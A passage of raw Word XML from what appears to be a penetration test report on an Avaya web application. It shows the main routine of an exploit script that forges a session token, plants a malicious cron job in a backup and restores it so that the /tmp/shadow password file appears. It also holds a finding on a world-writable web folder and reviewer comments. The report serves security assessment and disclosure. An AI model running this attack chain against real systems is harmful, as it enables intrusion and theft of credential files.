              <w:t>/results.txt", "w", 0) as f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A59D4BE" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="73434EFE" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>f.write</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>("Stage 1: Forging Session Token...\n")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="783A5B88" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sessionid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>create_session_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>token</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>IP, USER)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71D67AF2" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4C379092" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>f.write</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">("Stage 2: Activating forged token: " + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sessionid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> + "...\n")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AB21838" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>get_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>request</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>"common/legal/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>w_legal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">", </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sessionid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, IP)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D57D463" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D7BD512" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>f.write</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>("Stage 3: Creating a backup (can be very slow)...\n")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72A9FE29" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    backup = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>do_get_backup_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>post</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>sessionid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, IP)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E8856F0" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4F7C32B1" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    if not backup:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AB193BA" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>f.write</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>("Error: Backup not created for some reason.\n")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="397D4832" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>exit(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>-1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16478926" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="51652842" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>f.write</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30C64152" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        "Stage 4: Altering backup with malicious </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> job and dropping payload...\n"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40C4BC5C" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="567AD988" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>create_malicious_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>backup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>"/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/" + backup)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41F81484" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6537EB2F" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>f.write</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">("Stage 5: Restoring </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>malicous</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> backup...\n")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D46651C" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>do_restore_backup_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>post</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>sessionid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, IP, "/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/mal_backup.tar.gz")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00A1A064" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3655F2C2" w14:textId="5392DF2A" w:rsidR="006420A8" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>f.write</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>("Done.  Please wait approximately one minute for /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/shadow to appear.\n")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6394194B" w14:textId="2AF935D5" w:rsidR="006420A8" w:rsidRDefault="006420A8" w:rsidP="0014600F">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60910FFC" w14:textId="2A180906" w:rsidR="001E48A2" w:rsidRDefault="001E48A2" w:rsidP="001E48A2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Appendix 3: Missing Best Practice: Weak Folder Permissions Within Web Root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381F2405" w14:textId="0A812A61" w:rsidR="001E48A2" w:rsidRPr="00DC7DBE" w:rsidRDefault="001E48A2" w:rsidP="001E48A2">
      <w:r w:rsidRPr="00125652">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>CVSS 3.1:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> N/A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB595C1" w14:textId="77777777" w:rsidR="001E48A2" w:rsidRDefault="001E48A2" w:rsidP="001E48A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3EE0F5" w14:textId="77777777" w:rsidR="001E48A2" w:rsidRDefault="001E48A2" w:rsidP="001E48A2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FusionX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> discovered that one directory within the web root is writable by the apache user. This weak configuration would allow an attacker that had gained code execution or found an arbitrary file upload vulnerability to upload additional malicious scripts to a location within the web root, where these files could be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3948FAA9" w14:textId="77777777" w:rsidR="001E48A2" w:rsidRPr="00125652" w:rsidRDefault="001E48A2" w:rsidP="001E48A2">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Technical Details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC4EF33" w14:textId="77777777" w:rsidR="001E48A2" w:rsidRDefault="001E48A2" w:rsidP="001E48A2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FusionX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> found that the /var/www/html/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>avayadir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>avayadirini</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/ folder is writable by the apache user and is exposed via the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>avayadir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>avayadirini</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> URI. This folder can be used to host and execute maliciously uploaded PHP scripts. This would allow an attacker that has gained code execution or found an arbitrary </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>file upload vulnerability a location to store a web shell or host other malicious payloads.  Below is console output demonstrating these weak file permissions:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="001E48A2" w14:paraId="54CFA3EB" w14:textId="77777777" w:rsidTr="0006413C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="01194E26" w14:textId="77777777" w:rsidR="001E48A2" w:rsidRDefault="001E48A2" w:rsidP="0006413C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>admin@localhost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>www]$</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pwd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="42D7BA62" w14:textId="77777777" w:rsidR="001E48A2" w:rsidRDefault="001E48A2" w:rsidP="0006413C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>/var/www</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69160C61" w14:textId="77777777" w:rsidR="001E48A2" w:rsidRDefault="001E48A2" w:rsidP="0006413C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>admin@localhost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>www]$</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> find . -type d -exec ls -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ld</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> {} </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>\;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0DE5D52F" w14:textId="77777777" w:rsidR="001E48A2" w:rsidRDefault="001E48A2" w:rsidP="0006413C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45302DC9" w14:textId="77777777" w:rsidR="001E48A2" w:rsidRDefault="001E48A2" w:rsidP="0006413C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>drwxr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>xr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">-x. 8 tomcat apache 4096 Aug </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>19  2015</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> ./</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>avayadir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="64595D52" w14:textId="77777777" w:rsidR="001E48A2" w:rsidRDefault="001E48A2" w:rsidP="0006413C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>drwxr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>xr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">-x. 2 tomcat apache 4096 Aug </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>19  2015</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> ./</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>avayadir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>avayadirerror</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="535E02CE" w14:textId="77777777" w:rsidR="001E48A2" w:rsidRPr="009A383C" w:rsidRDefault="001E48A2" w:rsidP="0006413C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>drwxrwxrwx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve">. 2 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>tomcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve"> apache 4096 Nov 11 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>18:46 .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>avayadir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>avayadirini</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="589E87E1" w14:textId="77777777" w:rsidR="001E48A2" w:rsidRDefault="001E48A2" w:rsidP="0006413C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3592ECBE" w14:textId="77777777" w:rsidR="001E48A2" w:rsidRPr="004B1F46" w:rsidRDefault="001E48A2" w:rsidP="0014600F">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="001E48A2" w:rsidRPr="004B1F4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lexander, Bryan J." w:date="2020-12-17T11:37:00Z" w:initials="AJ">
    <w:p w14:paraId="21EDE4D6" w14:textId="1B1CD770" w:rsidR="0006413C" w:rsidRDefault="0006413C">
      <w:r>
        <w:t xml:space="preserve">Might be helpful to list the rules that you think would have prevented this, and detail why they </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>don't</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and which rules would?</w:t>
      </w:r>
      <w:r>
        <w:annotationRef/>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="5" w:author="Iglesias, Gerardo" w:date="2021-08-03T20:51:00Z" w:initials="IG">
    <w:p w14:paraId="2A4FAFCE" w14:textId="04FA84A0" w:rsidR="00D805D9" w:rsidRDefault="00DA43ED">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r w:rsidR="00E45682">
        <w:t xml:space="preserve">Apache rules would not prevent this, since the webpages are not being access </w:t>
      </w:r>
      <w:r w:rsidR="00D805D9">
        <w:t>via the web server</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="7" w:author="Alexander, Bryan J." w:date="2020-12-17T11:44:00Z" w:initials="AJ">
    <w:p w14:paraId="1373BEBB" w14:textId="1FCE4FFA" w:rsidR="0006413C" w:rsidRDefault="0006413C">
      <w:r>
        <w:t>For clarity it might be helpful to add a paragraph at the end to describe how you exploited this. It's not clear that this was exploited/exploitable due to the language in the final paragraph</w:t>
      </w:r>
      <w:r>
        <w:annotationRef/>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="8" w:author="Iglesias, Gerardo" w:date="2021-08-03T20:44:00Z" w:initials="IG">
    <w:p w14:paraId="7B83BABC" w14:textId="533386A5" w:rsidR="00E37422" w:rsidRDefault="00E37422">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>This was not exploited in our scenario</w:t>
      </w:r>
      <w:r w:rsidR="008E030B">
        <w:t xml:space="preserve">, due to the lack of existing sessions at the time of the attack, instead we exploited </w:t>
      </w:r>
      <w:r w:rsidR="00EA2786">
        <w:t xml:space="preserve">Issue 5. But this could </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EA2786">
        <w:t>definitely be</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00EA2786">
        <w:t xml:space="preserve"> exploited in other active environ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EDE4D6" w15:done="0"/>
  <w15:commentEx w15:paraId="2A4FAFCE" w15:paraIdParent="21EDE4D6" w15:done="0"/>
  <w15:commentEx w15:paraId="1373BEBB" w15:done="0"/>
  <w15:commentEx w15:paraId="7B83BABC" w15:paraIdParent="1373B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474CD1" w16cex:dateUtc="2020-12-17T19:37:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="24B42ADC" w16cex:dateUtc="2021-08-04T01:51:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="7053BCF7" w16cex:dateUtc="2020-12-17T19:44:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="24B42932" w16cex:dateUtc="2021-08-04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EDE4D6" w16cid:durableId="0D474CD1"/>
  <w16cid:commentId w16cid:paraId="2A4FAFCE" w16cid:durableId="24B42ADC"/>
  <w16cid:commentId w16cid:paraId="1373BEBB" w16cid:durableId="7053BCF7"/>
  <w16cid:commentId w16cid:paraId="7B83BABC" w16cid:durableId="24B42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93D30" w14:textId="77777777" w:rsidR="0006413C" w:rsidRDefault="0006413C" w:rsidP="0054676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="28E5E4C0" w14:textId="77777777" w:rsidR="0006413C" w:rsidRDefault="0006413C" w:rsidP="0054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07BA" w14:textId="77777777" w:rsidR="0006413C" w:rsidRDefault="0006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849363"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
